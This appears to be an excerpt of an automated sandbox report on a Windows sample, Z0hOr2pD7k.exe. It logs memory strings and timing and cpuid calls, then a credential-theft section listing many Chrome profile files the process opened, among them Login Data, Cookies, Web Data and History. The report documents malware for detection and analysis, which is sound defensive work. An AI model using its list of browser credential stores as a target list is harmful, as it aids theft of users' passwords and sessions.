Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: Z0hOr2pD7k.exe, 00000000.00000002.917417847.0000000001930000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Code function: 0_2_009C2405 cpuid | 0_2_009C2405
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Code function: 0_2_009C2082 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 0_2_009C2082

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\index
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b769a4d951e2b603_0
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL-journal
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Last Tabs
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\c05775e9c4f00749_0
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\67c62b86322c36fa_0
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\78ce8e30f78a2d10_0
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Trust Tokens
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\CURRENT
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33ffb3f3969344d8_0
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\MANIFEST-000001
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\CURRENT
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\MANIFEST-000001
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.log
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.log
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media History-journal
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db-journal
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media History
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal